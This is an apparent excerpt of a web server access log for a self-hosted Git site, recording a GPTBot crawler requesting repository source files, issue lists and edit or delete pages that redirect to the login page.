"/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33700] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:17:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:17:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33389] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33682] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33393] [Gzip 10.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11133] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33688] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33389] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7655] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" -[17/Feb/2026:17:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:17:35:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:35:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9946] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:17:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 11071] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 37585] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 12487] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:35:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:17:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:17:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 11054] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:35:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:17:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:17:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 12503] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:17:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:17:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:17:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:17:35:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:35:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:35:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:35:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:35:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] 